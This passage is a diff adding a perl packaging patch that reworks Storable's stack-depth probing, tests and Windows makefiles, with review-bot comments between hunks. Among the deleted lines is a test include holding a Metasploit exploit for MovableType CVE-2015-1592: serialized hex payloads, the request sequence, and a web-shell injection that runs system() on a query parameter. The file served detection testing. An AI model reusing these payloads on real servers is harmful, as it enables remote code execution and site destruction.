701 +@@ -941,13 +948,13 @@ There are a few things you need to know, however:
702 +
703 + =item *
704 +
705 +-Since Storable 3.05 we probe for the stack recursion limit for references,
706 ++From Storable 3.05 to 3.13 we probed for the stack recursion limit for references,
707 + arrays and hashes to a maximal depth of ~1200-35000, otherwise we might
708 + fall into a stack-overflow. On JSON::XS this limit is 512 btw. With
709 + references not immediately referencing each other there's no such
710 + limit yet, so you might fall into such a stack-overflow segfault.
711 +
712 +-This probing and the checks performed have some limitations:
713 ++This probing and the checks we performed have some limitations:
714 +
715 + =over
716 +
717 +@@ -955,7 +962,9 @@ This probing and the checks performed have some limitations:
718 +
719 + the stack size at build time might be different at run time, eg. the
720 + stack size may have been modified with ulimit(1). If it's larger at
721 +-run time Storable may fail the freeze() or thaw() unnecessarily.
722 ++run time Storable may fail the freeze() or thaw() unnecessarily. If
723 ++it's larger at build time Storable may segmentation fault when
724 ++processing a deep structure at run time.
725 +
726 + =item *
727 +
728 +@@ -970,6 +979,8 @@ stack without triggering Storable's recursion protection.
729 +
730 + =back
731 +
732 ++So these now have simple defaults rather than probing at build-time.
733 ++
734 + You can control the maximum array and hash recursion depths by
735 + modifying C<$Storable::recursion_limit> and
736 + C<$Storable::recursion_limit_hash> respectively. Either can be set to
737 +diff --git a/dist/Storable/stacksize b/dist/Storable/stacksize
738 +index 14e0739..f93eccc 100644
739 +--- a/dist/Storable/stacksize
740 ++++ b/dist/Storable/stacksize
741 +@@ -1,21 +1,17 @@
742 + #!/usr/bin/perl
743 + # binary search maximum stack depth for arrays and hashes
744 +-# and store it in lib/Storable/Limit.pm
745 ++# and report it to stdout as code to set the limits
746 +
747 + use Config;
748 + use Cwd;
749 + use File::Spec;
750 + use strict;
751 +
752 +--d "lib" or mkdir "lib";
753 +--d "lib/Storable" or mkdir "lib/Storable";
754 +-
755 +-my $fn = "lib/Storable/Limit.pm";
756 + my $ptrsize = $Config{ptrsize};
757 + my ($bad1, $bad2) = (65001, 25000);
758 + sub QUIET () {
759 + (defined $ENV{MAKEFLAGS} and $ENV{MAKEFLAGS} =~ /\b(s|silent|quiet)\b/
760 +- and !defined($ENV{TRAVIS}))
761 ++ and !defined($ENV{TRAVIS})) || @ARGV && $ARGV[0] eq "-q"
762 + ? 1 : 0
763 + }
764 + sub PARALLEL () {
765 +@@ -32,11 +28,7 @@ sub is_miniperl {
766 + }
767 +
768 + if (is_miniperl()) {
769 +- if ($Config{usecrosscompile}) {
770 +- write_limits(500, 265);
771 +- exit;
772 +- }
773 +- die "Should not run during miniperl\n";
774 ++ die "Should not run using miniperl\n";
775 + }
776 + my $prefix = "";
777 + if ($^O eq "MSWin32") {
778 +@@ -51,58 +43,28 @@ elsif (system("ulimit -c 0 ;") == 0) {
779 + # try to prevent core dumps
780 + $prefix = "ulimit -c 0 ; ";
781 + }
782 +-if (@ARGV and $ARGV[0] eq '--core') {
783 +- $ENV{PERL_CORE} = 1;
784 +-}
785 + my $PERL = $^X;
786 +-if ($ENV{PERL_CORE}) {
787 +- my $path;
788 +- my $ldlib = $Config{ldlibpthname};
789 +- if (-d 'dist/Storable') {
790 +- chdir 'dist/Storable';
791 +- $PERL = "../../$PERL" unless $PERL =~ m|^/|;
792 +- }
793 +- if ($ldlib) {
794 +- $path = getcwd()."/../..";
795 +- }
796 +- if ($^O eq 'MSWin32' and -d '../dist/Storable') {
797 +- chdir '..\dist\Storable';
798 +- $PERL = "..\\..\\$PERL" unless $PERL =~ /^[A-Za-z]:\\/;
799 +- }
800 +- $PERL = "\"$PERL\"" if $PERL =~ / /;
801 +- if ($ldlib and $ldlib ne 'PATH') {
802 +- $PERL = "$ldlib=$path $PERL";
803 +- }
804 +-}
805 +-
806 + if ($^O eq "MSWin32") {
807 + require Win32;
808 + my ($str, $major, $minor) = Win32::GetOSVersion();
809 + if ($major < 6 || $major == 6 && $minor < 1) {
810 +- print "Using defaults for older Win32\n";
811 ++ print "# Using defaults for older Win32\n";
812 + write_limits(500, 256);
813 + exit;
814 + }
815 + }
816 + my ($n, $good, $bad, $found) =
817 + (65000, 100, $bad1, undef);
818 +-print "probe for max. stack sizes...\n" unless QUIET;
819 ++print "# probe for max. stack sizes...\n" unless QUIET;
820 + # -I. since we're run before pm_to_blib (which is going to copy the
821 + # file we create) and need to load our Storable.pm, not the already
822 + # installed Storable.pm
823 +-my $mblib = '-Mblib -I.';
824 +-if ($ENV{PERL_CORE}) {
825 +- if ($^O eq 'MSWin32') {
826 +- $mblib = '-I..\..\lib\auto -I..\..\lib';
827 +- } else {
828 +- $mblib = '-I../../lib/auto -I../../lib';
829 +- }
830 ++my $mblib = '';
831 ++if (-d 'blib') {
832 ++ $mblib = '-Mblib -I.';
833 + }
834 +-if (PARALLEL) {
835 +- # problem with parallel builds. wait for INST_DYNAMIC linking to be done.
836 +- # the problem is the RM_F INST_DYNAMIC race.
837 +- print "parallel build race - wait for linker ...\n" unless QUIET;
838 +- sleep(2.0);
839 ++elsif (-f "Configure") {
840 ++ $mblib = '-Ilib';
841 + }
842 +
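Review bot: `my $PERL = $^X;` is now used unquoted, because the only quoting of an interpreter path containing spaces, `$PERL = "\"$PERL\"" if $PERL =~ / /;`, sat inside the removed `PERL_CORE` block. `cmd` is defined outside this hunk, but `$prefix = "ulimit -c 0 ; "` suggests the probe is run through a shell string, in which case a path with spaces or shell metacharacters would presumably be split or misparsed; keeping that one quoting line directly after `my $PERL = $^X;` avoids it. The retained comment about "the file we create" is also stale now that the limits are printed to stdout, and could read `# -Mblib -I. so the probe loads the freshly built Storable.pm, not an installed one`. `PARALLEL` loses its only caller visible in this patch and may now be dead code.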
843 + sub cmd {
844 +@@ -117,7 +79,7 @@ sub cmd {
845 + sub good {
846 + my $i = shift; # this passed
847 + my $j = $i + abs(int(($bad - $i) / 2));
848 +- print "Storable: determining recursion limit: $i passed, try more $j ...\n" unless QUIET;
849 ++ print "# Storable: determining recursion limit: $i passed, try more $j ...\n" unless QUIET;
850 + $good = $i;
851 + if ($j <= $i) {
852 + $found++;
853 +@@ -128,7 +90,7 @@ sub good {
854 + sub bad {
855 + my $i = shift; # this failed
856 + my $j = $i - abs(int(($i - $good) / 2));
857 +- print "Storable: determining recursion limit: $i too big, try less $j ...\n" unless QUIET;
858 ++ print "# Storable: determining recursion limit: $i too big, try less $j ...\n" unless QUIET;
859 + $bad = $i;
860 + if ($j >= $i) {
861 + $j = $good;
862 +@@ -162,7 +124,7 @@ while (!$found) {
863 + $n = bad($n);
864 + }
865 + }
866 +-print "MAX_DEPTH = $n\n" unless QUIET;
867 ++print "# MAX_DEPTH = $n\n" unless QUIET;
868 + my $max_depth = $n;
869 +
870 + ($n, $good, $bad, $found) =
871 +@@ -186,13 +148,13 @@ if ($max_depth == $bad1-1
872 + and $n == $bad2-1)
873 + {
874 + # more likely the shell. travis docker ubuntu, mingw e.g.
875 +- print "Error: Apparently your system(SHELLSTRING) cannot catch stack overflows\n"
876 ++ print "# Apparently your system(SHELLSTRING) cannot catch stack overflows\n"
877 + unless QUIET;
878 + $max_depth = 512;
879 + $n = 256;
880 + print "MAX_DEPTH = $max_depth\n" unless QUIET;
881 + }
882 +-print "MAX_DEPTH_HASH = $n\n" unless QUIET;
883 ++print "# MAX_DEPTH_HASH = $n\n" unless QUIET;
884 + my $max_depth_hash = $n;
885 +
886 + # Previously this calculation was done in the macro, calculate it here
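Review bot: The `print "MAX_DEPTH = $max_depth\n" unless QUIET;` line inside the fallback branch was left without the `# ` prefix that every other diagnostic in this file gains in this patch. Since write_limits (changed in the last hunk of this file) now prints the generated assignments to standard output instead of writing them to `$fn`, this line would presumably land in whatever captures that output as a non-comment line. It should read `print "# MAX_DEPTH = $max_depth\n" unless QUIET;`. The enclosing `if` starts outside the hunk and QUIET's definition is not visible here.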
887 +@@ -203,7 +165,7 @@ my $max_depth_hash = $n;
888 + # several apparently random failures here, eg. working in one
889 + # configuration, but not in a very similar configuration.
890 + $max_depth = int(0.6 * $max_depth);
891 +-$max_depth_hash = int(0.6 * $max_depth);
892 ++$max_depth_hash = int(0.6 * $max_depth_hash);
893 +
894 + my $stack_reserve = $^O eq "MSWin32" ? 32 : 16;
895 + if ($] ge "5.016" && !($^O eq "cygwin" && $ptrsize == 8)) {
896 +@@ -221,16 +183,11 @@ write_limits($max_depth, $max_depth_hash);
897 +
898 + sub write_limits {
899 + my ($max_depth, $max_depth_hash) = @_;
900 +- my $f;
901 +- open $f, ">", $fn or die "$fn $!";
902 +- print $f <<EOS;
903 ++ print <<EOS;
904 + # bisected by stacksize
905 + \$Storable::recursion_limit = $max_depth
906 + unless defined \$Storable::recursion_limit;
907 + \$Storable::recursion_limit_hash = $max_depth_hash
908 + unless defined \$Storable::recursion_limit_hash;
909 +-1;
910 + EOS
911 +- close $f
912 +- or die "Failed to close $fn: $!\n";
913 + }
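Review bot: With the file handle gone, nothing in write_limits checks that the generated assignments were actually written: the removed code died on a failed open or close, whereas the new `print <<EOS;` ignores its result. Because the fragment now goes to standard output, a failed or short write would presumably leave the consumer with truncated recursion limits and no build error. `print <<EOS or die "Failed to write limits: $!\n";` restores a check. A one-line comment above the sub, saying that the fragment is emitted on STDOUT for the caller to capture, would document the new contract.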
914 +diff --git a/dist/Storable/t/CVE-2015-1592.inc b/dist/Storable/t/CVE-2015-1592.inc
915 +deleted file mode 100644
916 +index 481dba5..0000000
917 +--- a/dist/Storable/t/CVE-2015-1592.inc
918 ++++ /dev/null
919 +@@ -1,261 +0,0 @@
920 +-#!/usr/bin/perl
921 +-
922 +-=pod
923 +-
924 +-class MetasploitModule < Msf::Exploit::Remote
925 +- Rank = GoodRanking
926 +-
927 +- include Msf::Exploit::Remote::HttpClient
928 +-
929 +- def initialize(info = {})
930 +- super(update_info(info,
931 +- 'Name' => 'SixApart MovableType Storable Perl Code Execution',
932 +- 'Description' => %q{
933 +- This module exploits a serialization flaw in MovableType before 5.2.12 to execute
934 +- arbitrary code. The default nondestructive mode depends on the target server having
935 +- the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths.
936 +- The destructive mode of operation uses only required MovableType dependencies,
937 +- but it will noticeably corrupt the MovableType installation.
938 +- },
939 +- 'Author' =>
940 +- [
941 +- 'John Lightsey',
942 +- ],
943 +- 'License' => MSF_LICENSE,
944 +- 'References' =>
945 +- [
946 +- [ 'CVE', '2015-1592' ],
947 +- [ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ],
948 +- ],
949 +- 'Privileged' => false, # web server context
950 +- 'Payload' =>
951 +- {
952 +- 'DisableNops' => true,
953 +- 'BadChars' => ' ',
954 +- 'Space' => 1024,
955 +- },
956 +- 'Compat' =>
957 +- {
958 +- 'PayloadType' => 'cmd'
959 +- },
960 +- 'Platform' => ['unix'],
961 +- 'Arch' => ARCH_CMD,
962 +- 'Targets' => [['Automatic', {}]],
963 +- 'DisclosureDate' => 'Feb 11 2015',
964 +- 'DefaultTarget' => 0))
965 +-
966 +- register_options(
967 +- [
968 +- OptString.new('TARGETURI', [true, 'MoveableType cgi-bin directory path', '/cgi-bin/mt/']),
969 +- OptBool.new('DESTRUCTIVE', [true, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false])
970 +- ], self.class
971 +- )
972 +-
973 +- end
974 +-
975 +-=cut
976 +-
977 +-# generate config parameters for injection checks
978 +-
979 +-use Storable;
980 +-
981 +-{
982 +-
983 +- package XXXCHECKXXX;
984 +-
985 +- sub STORABLE_thaw {
986 +- return 1;
987 +- }
988 +-
989 +- sub STORABLE_freeze {
990 +- return 1;
991 +- }
992 +-
993 +-}
994 +-
995 +-my $check_obj = bless { ignore => 'this' }, XXXCHECKXXX;
996 +-my $frozen2 = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj});
997 +-$frozen2 = unpack 'H*', $frozen2;
998 +-#print "LFI test for storable flaw is: $frozen2\n";
999 +-
1000 +-{
1001 +- package DateTime;
1002 +- use overload '+' => sub { 'ignored' };
1003 +-}
1004 +-
1005 +-=pod
1006 +-
1007 +- def check
1008 +- vprint_status("Sending storable test injection for XXXCHECKXXX.pm load failure")
1009 +- res = send_request_cgi({
1010 +- 'method' => 'GET',
1011 +- 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
1012 +- 'vars_get' => {
1013 +- '__mode' => 'retry',
1014 +- 'step' => 'configure',
1015 +- 'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078'
1016 +- }
1017 +- })
1018 +-
1019 +- unless res && res.code == 200 && res.body.include?("Can't locate XXXCHECKXXX.pm")
1020 +- vprint_status("Failed XXXCHECKXXX.pm load test");
1021 +- return Exploit::CheckCode::Safe
1022 +- end
1023 +- Exploit::CheckCode::Vulnerable
1024 +- end
1025 +-
1026 +- def exploit
1027 +- if datastore['DESTRUCTIVE']
1028 +- exploit_destructive
1029 +- else
1030 +- exploit_nondestructive
1031 +- end
1032 +- end
1033 +-
1034 +-=cut
1035 +-
1036 +-#!/usr/bin/perl
1037 +-
1038 +-# Generate nondestructive config parameter for RCE via Object::MultiType
1039 +-# and Try::Tiny. The generated value requires minor modification to insert
1040 +-# the payload inside the system() call and resize the padding.
1041 +-
1042 +-use Storable;
1043 +-
1044 +-{
1045 +- package Object::MultiType;
1046 +- use overload '+' => sub { 'ingored' };
1047 +-}
1048 +-
1049 +-{
1050 +- package Object::MultiType::Saver;
1051 +-}
1052 +-
1053 +-#{
1054 +-# package DateTime;
1055 +-# use overload '+' => sub { 'ingored' };
1056 +-#}
1057 +-
1058 +-{
1059 +- package Try::Tiny::ScopeGuard;
1060 +-}
1061 +-
1062 +-my $try_tiny_loader = bless {}, 'DateTime';
1063 +-my $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver';
1064 +-my $multitype_coderef = bless \$multitype_saver, 'Object::MultiType';
1065 +-my $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\n\n};system(q{});' . ('#' x 1025) . "\nexit;"], 'Try::Tiny::ScopeGuard';
1066 +-
1067 +-my $data = [$try_tiny_loader, $try_tiny_executor];
1068 +-my $frozen1 = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
1069 +-$frozen1 = unpack 'H*', $frozen1;
1070 +-#print "RCE payload requiring Object::MultiType and DateTime: $frozen1\n";
1071 +-
1072 +-=pod
1073 +-
1074 +- def exploit_nondestructive
1075 +- print_status("Using nondestructive attack method")
1076 +- config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b"
1077 +- config_payload << payload.encoded.unpack('H*')[0]
1078 +- config_payload << "7d293b"
1079 +- config_payload << "23" * (1025 - payload.encoded.length)
1080 +- config_payload << "0a657869743b"
1081 +-
1082 +- print_status("Sending payload (#{payload.raw.length} bytes)")
1083 +-
1084 +- send_request_cgi({
1085 +- 'method' => 'GET',
1086 +- 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
1087 +- 'vars_get' => {
1088 +- '__mode' => 'retry',
1089 +- 'step' => 'configure',
1090 +- 'config' => config_payload
1091 +- }
1092 +- }, 5)
1093 +- end
1094 +-
1095 +-=cut
1096 +-
1097 +-#!/usr/bin/perl
1098 +-
1099 +-# Generate destructive config parameter to unlink mt-config.cgi
1100 +-
1101 +-use Storable;
1102 +-
1103 +-{
1104 +- package CGITempFile;
1105 +-}
1106 +-
1107 +-my $unlink_target = "mt-config.cgi";
1108 +-my $cgitempfile = bless \$unlink_target, "CGITempFile";
1109 +-
1110 +-$data = [$cgitempfile];
1111 +-my $frozen_data = Storable::freeze($data);
1112 +-my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . $frozen_data;
1113 +-$frozen = unpack 'H*', $frozen;
1114 +-#print "RCE unlink payload requiring CGI: $frozen\n";
1115 +-
1116 +-# $Storable::DEBUGME = 1;
1117 +-# $^W = 1;
1118 +-Storable::thaw($frozen_data);
1119 +-
1120 +-=pod
1121 +-
1122 +-def exploit_destructive
1123 +- print_status("Using destructive attack method")
1124 +- # First we need to delete mt-config.cgi using the storable injection
1125 +-
1126 +- print_status("Sending storable injection to unlink mt-config.cgi")
1127 +-
1128 +- res = send_request_cgi({
1129 +- 'method' => 'GET',
1130 +- 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
1131 +- 'vars_get' => {
1132 +- '__mode' => 'retry',
1133 +- 'step' => 'configure',
1134 +- 'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769'
1135 +- }
1136 +- })
1137 +-
1138 +- if res && res.code == 200
1139 +- print_status("Successfully sent unlink request")
1140 +- else
1141 +- fail_with(Failure::Unknown, "Error sending unlink request")
1142 +- end
1143 +-
1144 +- # Now we rewrite mt-config.cgi to accept a payload
1145 +-
1146 +- print_status("Rewriting mt-config.cgi to accept the payload")
1147 +-
1148 +- res = send_request_cgi({
1149 +- 'method' => 'GET',
1150 +- 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
1151 +- 'vars_get' => {
1152 +- '__mode' => 'next_step',
1153 +- 'step' => 'optional',
1154 +- 'default_language' => 'en_us',
1155 +- 'email_address_main' => "x\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\n\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1",
1156 +- 'set_static_uri_to' => '/',
1157 +- 'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/',
1158 +- }
1159 +- })
1160 +-
1161 +- if res && res.code == 200
1162 +- print_status("Successfully sent mt-config rewrite request")
1163 +- else
1164 +- fail_with(Failure::Unknown, "Error sending mt-config rewrite request")
1165 +- end
1166 +-
1167 +- # Finally send the payload
1168 +-
1169 +- print_status("Sending payload request")
1170 +-
1171 +- send_request_cgi({
1172 +- 'method' => 'GET',
1173 +- 'uri' => normalize_uri(target_uri.path, 'mt.cgi'),
1174 +- 'vars_get' => {
1175 +- 'xyzzy' => payload.encoded,
1176 +- }
1177 +- }, 5)
1178 +- end
1179 +-
1180 +-=cut
1181 +diff --git a/dist/Storable/t/CVE-2015-1592.t b/dist/Storable/t/CVE-2015-1592.t
1182 +index 2730cdc..a71f44c 100644
1183 +--- a/dist/Storable/t/CVE-2015-1592.t
1184 ++++ b/dist/Storable/t/CVE-2015-1592.t
1185 +@@ -1,22 +1,21 @@
1186 + #!/usr/bin/perl
1187 +
1188 + use strict;
1189 ++use warnings;
1190 + use Test::More;
1191 ++use Storable qw(freeze thaw);
1192 + plan tests => 1;
1193 +
1194 +-use File::Temp qw(tempdir);
1195 +-use File::Spec;
1196 +-my $tmp_dir = tempdir(CLEANUP => 1);
1197 +-my $tmp_file = File::Spec->catfile($tmp_dir, 'sploit');
1198 ++# this original worked with the packaged exploit, but that
1199 ++# triggers virus scanners, so test for the behaviour instead
1200 ++my $x = bless \(my $y = "mt-config.cgi"), "CGITempFile";
1201 ++
1202 ++my $frozen = freeze($x);
1203 +
1204 +-my $file = __FILE__;
1205 +-$file =~ s/\.t$/.inc/;
1206 +-my $inc = $ENV{PERL_CORE} ? "-Ilib -I../../lib" : "-I".join(" -I", @INC);
1207 +-system qq($^X $inc -w "$file" 2>$tmp_file);
1208 +-open(my $fh, "<", $tmp_file) or die "$tmp_file $!";
1209 + {
1210 +- local $/;
1211 +- my $err = <$fh>;
1212 +- like($err, qr/SECURITY: Movable-Type CVE-2015-1592 Storable metasploit attack/,
1213 +- 'Detect CVE-2015-1592');
1214 ++ my $warnings = '';
1215 ++ local $SIG{__WARN__} = sub { $warnings .= "@_" };
1216 ++ thaw($frozen);
1217 ++ like($warnings, qr/SECURITY: Movable-Type CVE-2015-1592 Storable metasploit attack/,
1218 ++ 'Detect CVE-2015-1592');
1219 + }
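Review bot: The rewritten test discards the return value of `thaw($frozen)` and asserts only on the warning text, so it pins detection of the pattern but not what thaw hands back afterwards. The frozen value is a scalar ref blessed into `CGITempFile`, and the test is presumably harmless only while no loaded module gives that class a destructor. A comment above the `bless` line such as `# CGI must not be loaded here: a CGITempFile destructor would act on the named file` would keep a later edit from adding it. The new comment's `this original worked` probably means `this originally worked`.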
1220 +diff --git a/dist/Storable/t/dclone.t b/dist/Storable/t/dclone.t
1221 +index af3d7f6..ce6c756 100644
1222 +--- a/dist/Storable/t/dclone.t
1223 ++++ b/dist/Storable/t/dclone.t
1224 +@@ -87,6 +87,8 @@ SKIP: {
1225 + # Do not fail if Tie::Hash and/or Tie::StdHash is not available
1226 + skip 'No Tie::StdHash available', 2
1227 + unless eval { require Tie::Hash; scalar keys %Tie::StdHash:: };
1228 ++ skip 'This version of perl has problems with Tie::StdHash', 2
1229 ++ if $] eq "5.008";
1230 + tie my %tie, "Tie::StdHash" or die $!;
1231 + $tie{array} = [1,2,3,4];
1232 + $tie{hash} = {1,2,3,4};
1233 +diff --git a/dist/Storable/t/recurse.t b/dist/Storable/t/recurse.t
1234 +index 63fde90..b5967a0 100644
1235 +--- a/dist/Storable/t/recurse.t
1236 ++++ b/dist/Storable/t/recurse.t
1237 +@@ -318,9 +318,11 @@ is($refcount_ok, 1, "check refcount");
1238 + # Small 64bit systems fail with 1200 (c++ debugging), with gcc 3000.
1239 + # Optimized 64bit allows up to 33.000 recursion depth.
1240 + # with asan the limit is 255 though.
1241 ++
1242 ++local $Storable::recursion_limit = 30;
1243 ++local $Storable::recursion_limit_hash = 20;
1244 + sub MAX_DEPTH () { Storable::stack_depth() }
1245 + sub MAX_DEPTH_HASH () { Storable::stack_depth_hash() }
1246 +-sub OVERFLOW () { 35000 }
1247 + {
1248 + my $t;
1249 + print "# max depth ", MAX_DEPTH, "\n";
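Review bot: The two added `local` lines carry no comment explaining why the limits are pinned to 30 and 20. At file scope the `local` lasts for the rest of recurse.t, so the later depth checks presumably run against these fixed values rather than the limits probed at build time, which is the guard against stack exhaustion on deeply nested input. If that is the intent, a comment such as `# use small fixed limits so the test does not depend on the probed stack size` would say so. Whether `OVERFLOW` is still referenced further down cannot be seen from here, because the bare block that follows continues outside the hunk.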
1250 +diff --git a/dist/Storable/t/threads.t b/dist/Storable/t/threads.t
1251 +index 0bc2486..0b34334 100644
1252 +--- a/dist/Storable/t/threads.t
1253 ++++ b/dist/Storable/t/threads.t
1254 +@@ -28,6 +28,10 @@ sub BEGIN {
1255 + print "1..0 # Skip: no threads\n";
1256 + exit 0;
1257 + }
1258 ++ if ($] eq "5.008" || $] eq "5.010000") {
1259 ++ print "1..0 # Skip: threads unreliable in perl-$]\n";
1260 ++ exit 0;
1261 ++ }
1262 + # - is \W, so can't use \b at start. Negative look ahead and look behind
1263 + # works at start/end of string, or where preceded/followed by spaces
1264 + if ($] == 5.008002 and eval q{ $Config{'ccflags'} =~ /(?<!\S)-DDEBUGGING(?!\S)/ }) {
1265 +diff --git a/mkppport.lst b/mkppport.lst
1266 +index a443dac..b3992c8 100644
1267 +--- a/mkppport.lst
1268 ++++ b/mkppport.lst
1269 +@@ -12,3 +12,4 @@ cpan/Win32API-File
1270 + dist/IO
1271 + dist/PathTools
1272 + dist/Time-HiRes
1273 ++dist/Storable
1274 +diff --git a/win32/GNUmakefile b/win32/GNUmakefile
1275 +index 200d8a5..1c163d7 100644
1276 +--- a/win32/GNUmakefile
1277 ++++ b/win32/GNUmakefile
1278 +@@ -1177,7 +1177,7 @@ CFG_VARS = \
1279 +
1280 + .PHONY: all info
1281 +
1282 +-all : info rebasePE Extensions_nonxs $(PERLSTATIC) PostExt
1283 ++all : info rebasePE Extensions_nonxs $(PERLSTATIC)
1284 +
1285 + info :
1286 + @echo # CCTYPE=$(CCTYPE)
1287 +@@ -1621,16 +1621,6 @@ Extensions_clean :
1288 + Extensions_realclean :
1289 + -if exist $(MINIPERL) $(MINIPERL) -I..\lib ..\make_ext.pl "MAKE=$(PLMAKE)" --dir=$(CPANDIR) --dir=$(DISTDIR) --dir=$(EXTDIR) --all --target=realclean
1290 +
1291 +-PostExt : ..\lib\Storable\Limit.pm
1292 +-
1293 +-# we need the exe, perl(ver).dll, and the Exporter, Storable, Win32 extensions
1294 +-# rebasePE most of that, including adjustment for static builds, so we
1295 +-# just need non-xs extensions
1296 +-..\lib\Storable\Limit.pm : rebasePE Extensions_nonxs
1297 +- $(PLMAKE) -C ..\dist\Storable lib\Storable\Limit.pm
1298 +- if not exist ..\lib\Storable mkdir ..\lib\Storable
1299 +- copy ..\dist\Storable\lib\Storable\Limit.pm ..\lib\Storable\Limit.pm
1300 +-
1301 + # all PE files need to be built by the time this target runs, PP files can still
1302 + # be running in parallel like UNIDATAFILES, this target a placeholder for the
1303 + # future
1304 +diff --git a/win32/Makefile b/win32/Makefile
1305 +index 481fcd8..8e7878c 100644
1306 +--- a/win32/Makefile
1307 ++++ b/win32/Makefile
1308 +@@ -948,7 +948,7 @@ CFG_VARS = \
1309 + #
1310 +
1311 + all : .\config.h ..\git_version.h $(GLOBEXE) $(CONFIGPM) \
1312 +- $(UNIDATAFILES) MakePPPort $(PERLEXE) Extensions_nonxs Extensions PostExt \
1313 ++ $(UNIDATAFILES) MakePPPort $(PERLEXE) Extensions_nonxs Extensions \
1314 + $(PERLSTATIC)
1315 + @echo Everything is up to date. '$(MAKE_BARE) test' to run test suite.
1316 +
1317 +@@ -1234,13 +1234,6 @@ Extensions_clean:
1318 + Extensions_realclean:
1319 + -if exist $(MINIPERL) $(MINIPERL) -I..\lib ..\make_ext.pl "MAKE=$(MAKE)" --dir=$(CPANDIR) --dir=$(DISTDIR) --dir=$(EXTDIR) --all --target=realclean
1320 +
1321 +-PostExt: ..\lib\Storable\Limit.pm
1322 +-
1323 +-..\lib\Storable\Limit.pm: $(PERLEXE) Extensions
1324 +- cd ..\dist\Storable && $(MAKE) lib\Storable\Limit.pm
1325 +- if not exist ..\lib\Storable mkdir ..\lib\Storable
1326 +- copy ..\dist\Storable\lib\Storable\Limit.pm ..\lib\Storable\Limit.pm
1327 +-
1328 + #-------------------------------------------------------------------------------
1329 +
1330 + doc: $(PERLEXE) ..\pod\perltoc.pod
1331 +@@ -1319,7 +1312,6 @@ distclean: realclean
1332 + -del /f $(LIBDIR)\Time\HiRes.pm
1333 + -del /f $(LIBDIR)\Unicode\Normalize.pm
1334 + -del /f $(LIBDIR)\Math\BigInt\FastCalc.pm
1335 +- -del /f $(LIBDIR)\Storable.pm $(LIBDIR)\Storable\Limit.pm
1336 + -del /f $(LIBDIR)\Win32.pm
1337 + -del /f $(LIBDIR)\Win32CORE.pm
1338 + -del /f $(LIBDIR)\Win32API\File.pm
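Review bot: This distclean hunk drops the whole `-del /f $(LIBDIR)\Storable.pm $(LIBDIR)\Storable\Limit.pm` line, while the matching hunk in win32/makefile.mk keeps `-del /f $(LIBDIR)\Storable.pm` and removes only the Limit.pm part. If Storable.pm is still copied into `$(LIBDIR)` by the build, this makefile's distclean would leave it behind. Keeping `-del /f $(LIBDIR)\Storable.pm` here would make the two makefiles agree. The distclean rule starts and ends outside the hunk.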
1339 +diff --git a/win32/makefile.mk b/win32/makefile.mk
1340 +index 7dae753..8122c75 100644
1341 +--- a/win32/makefile.mk
1342 ++++ b/win32/makefile.mk
1343 +@@ -1148,7 +1148,7 @@ CFG_VARS = \
1344 + # Top targets
1345 + #
1346 +
1347 +-all : CHECKDMAKE rebasePE Extensions_nonxs $(PERLSTATIC) PostExt
1348 ++all : CHECKDMAKE rebasePE Extensions_nonxs $(PERLSTATIC)
1349 +
1350 + ..\regcomp$(o) : ..\regnodes.h ..\regcharclass.h
1351 +
1352 +@@ -1572,17 +1572,6 @@ rebasePE : Extensions $(PERLDLL) $(NORMALIZE_DYN) $(PERLEXE)
1353 + .ENDIF
1354 + $(NOOP)
1355 +
1356 +-PostExt : ..\lib\Storable\Limit.pm
1357 +- $(NOOP)
1358 +-
1359 +-# we need the exe, perl(ver).dll, and the Exporter, Storable, Win32 extensions
1360 +-# rebasePE most of that, including adjustment for static builds, so we
1361 +-# just need non-xs extensions
1362 +-..\lib\Storable\Limit.pm : rebasePE Extensions_nonxs
1363 +- cd ..\dist\Storable && $(MAKE) lib\Storable\Limit.pm
1364 +- if not exist ..\lib\Storable mkdir ..\lib\Storable
1365 +- copy ..\dist\Storable\lib\Storable\Limit.pm ..\lib\Storable\Limit.pm
1366 +-
1367 + #-------------------------------------------------------------------------------
1368 +
1369 +
1370 +@@ -1657,7 +1646,7 @@ distclean: realclean
1371 + -del /f $(LIBDIR)\Time\HiRes.pm
1372 + -del /f $(LIBDIR)\Unicode\Normalize.pm
1373 + -del /f $(LIBDIR)\Math\BigInt\FastCalc.pm
1374 +- -del /f $(LIBDIR)\Storable.pm $(LIBDIR)\Storable\Limit.pm
1375 ++ -del /f $(LIBDIR)\Storable.pm
1376 + -del /f $(LIBDIR)\Win32.pm
1377 + -del /f $(LIBDIR)\Win32CORE.pm
1378 + -del /f $(LIBDIR)\Win32API\File.pm
1379 +--
1380 +2.21.0
1381 +
1382
1383 diff --git a/dev-lang/perl/perl-5.28.1.ebuild b/dev-lang/perl/perl-5.28.2.ebuild
1384 similarity index 97%
1385 rename from dev-lang/perl/perl-5.28.1.ebuild
1386 rename to dev-lang/perl/perl-5.28.2.ebuild
1387 index 05c722d..9de40db 100644
1388 --- a/dev-lang/perl/perl-5.28.1.ebuild
1389 +++ b/dev-lang/perl/perl-5.28.2.ebuild
